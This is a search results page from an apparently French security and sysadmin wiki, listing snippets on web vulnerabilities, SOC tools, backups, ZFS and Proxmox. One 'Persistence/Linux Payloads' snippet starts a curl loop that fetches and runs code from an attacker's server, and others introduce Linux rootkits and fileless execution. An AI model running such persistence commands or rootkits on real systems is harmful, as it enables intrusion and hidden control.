Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

286 total results found

[Exploitation/Web] SSTI

Exploitation Web

Introduction La vulnérabilité SSTI, pour Server-Side Template Injection, permet à un attaquant d’injecter du code malveillant dans un moteur de template côté serveur, pouvant conduire à l’exécution de commandes à distance. Cette faille va exploiter les moteur...

[Exploitation/Web] XSLT

Exploitation Web

Introduction La vulnérabilité XSLT (Extensible Stylesheet Language Transformations) survient lorsqu’un moteur de transformation XML mal sécurisé permet à un attaquant d’injecter ou d’exécuter du code XSLT arbitraire, pouvant mener à l’exfiltration de données,...

[Exploitation/Web] Déserialisation

Exploitation Web

Introduction Parfois, le serveur web a besoin d'enregistrer des données dans un fichier pour les recharger à un autre moment. Il fait donc de la sérialisation pour enregistrer un ou plusieurs objets (POO) puis de la déserialisation pour reconstruire les objet...

[SOC] Graylog

SOC

Introduction Graylog est un SIEM qui permet de centraliser vos logs et de faire des queries pour faire des analyses de threat hunting notamment. Sources https://www.it-connect.fr/tuto-graylog-sur-debian-centraliser-et-analyser-logs/ https://www.it-co...

[SOC] Cyberchef

SOC

Introduction Cyberchef est un outil pour décoder, formater etc très utile en CTF ou dans les tâches quotidiennes. Sources https://gchq.github.io/CyberChef/ https://kravensecurity.com/cyberchef-guide/#CyberChef Cyberchef API Un projet a été réalisé,...

[Stegano] Audio

Exploitation Steganographie

Introduction Il est possible de cacher de l'information dans des fichiers audio comme des fichiers WAV grâce à des logiciels comme Coagula. On peut ensuite retrouver ces messages dans des logiciels comme Audacity. Source https://medium.com/@AungKyawZall/...

[Busybox] Cheat-sheet

Busybox

Introduction Busybox est une boîte à outils qui embarque beaucoup de binaires basiques et très pratiques pour dépanner ou effectuer tout un tas de tâches. Il peut aussi très bien être détourné pour être utilisé à des fins malveillantes. Cheat-sheet Aide ...

[NixOS] Cheat-sheet

NixOS

Introduction NixOS est une distribution Linux qui utilise un fichier de configuration pour construire une image qui sera répliquable sur n'importe quelle configuration. Ressources https://search.nixos.org/packages?channel=25.05 https://search.nixos.org...

[Backup] Restic

Backup

Introduction Restic est un outil qui permet de faire des sauvegardes comme pourrait le faire borg. À noter qu'il supporte différents protocoles et qu'il permet d'envoyer des backups via ssh notamment. Il protège aussi les backups avec un mot de passe par défa...

[Persistence/Linux] Payloads

Persistence Linux

Introduction Cette page référence quelque payloads prêt à l'emploi pour de la persistance Linux. Payloads curl Le payload suivant va récupérer la charge sur le serveur web de l'attaquant toutes les 60 secondes et l'exécuter : while true; do curl -s http:/...

[Linux] Exécution de binaire en mode fileless

Exploitation Linux

Introduction Cette technique consiste à exécuter des binaires sur un systèmes Linux sans qu'aucun fichier ne soit jamais écrit sur le disque. Pour cela, nous allons simplement utiliser un dropper en python qui va écouter continuellement sur le réseau pour ré...

[Linux] Diamorphine

Exploitation Linux

Introduction Diamorphine est un rootkit Linux open source qui possède plusieurs fonctions : Masquer des processus Masquer des fichiers Backdoor utilisateur root Diamorphine Github https://github.com/m0nad/Diamorphine/tree/master Installation ...

[Linux] Boopkit

Exploitation Linux

Introduction Boopkit est un rootkit open source qui exploite eBPF pour envoyer des payloads. Le gros avantage c'est qu'il ne va pas ouvrir de socket réseau pour fonctionner : il va se placer niveau kernel et intercepter tous les paquets réseaux qui passent pa...

[Debian] Raid ZFS

Debian

Introduction Le raid avec ZFS est considéré comme plus performant et plus moderne donc recommandable. Raid1 Identification des disques lsblk -o NAME,SIZE,MODEL,SERIAL ls -l /dev/disk/by-id/ | grep -E 'sda|sdb' Notez les identifiants (ata-XXXXX). Const...

[Splunk] SPL

SOC [SOC] Splunk

Introduction Le SPL est le langage de requête propriétaire à Splunk. Il est extrêmement puissant mais utilise une syntaxe peu triviale. Cheat-sheet Index Pour chercher dans un index : index="main" Opérateurs Opérateurs = != > ...

[Proxmox] Exporter une VM de Virtualbox à Proxmox

Proxmox

Introduction Le passage d'une VM de Virtualbox à Proxmox n'est pas supporté de manière graphique dans Proxmox mais quelques lignes de commande assez simples permettent de réaliser ces opérations. Manuel La première étape est de copier le fichier de disque...